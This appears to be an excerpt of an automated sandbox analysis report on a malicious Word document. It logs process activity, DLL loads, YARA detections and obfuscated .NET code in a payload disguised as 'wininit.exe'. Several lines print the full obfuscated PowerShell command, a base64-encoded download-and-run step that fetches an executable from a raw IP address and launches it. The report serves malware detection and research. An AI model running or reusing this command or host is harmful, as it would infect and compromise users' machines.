                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: vaultcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: wkscli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samcli.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: samlib.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\wininit.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: stthigns.LNK.0.drLNK file: ..\..\..\..\..\Desktop\stthigns.doc
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: p7C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.pdb source: powershell.exe, 00000006.00000002.387368019.0000000002831000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{8F9E19BA-7C14-4A61-89D3-CF9016D92B91}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: Yara matchFile source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.wininit.exe.3a0edc0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.wininit.exe.3a28de0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 3868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 3932, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_001F21E3 push ebx; iretd 6_2_001F21EA
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AD4
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AFC
                Source: caspol[1].exe.6.drStatic PE information: section name: .text entropy: 7.9227520273220895
                Source: wininit.exe.6.drStatic PE information: section name: .text entropy: 7.9227520273220895
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
                Source: 13.2.wininit.exe.3a6cfe0.3.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
                Source: 13.2.wininit.exe.4d00000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
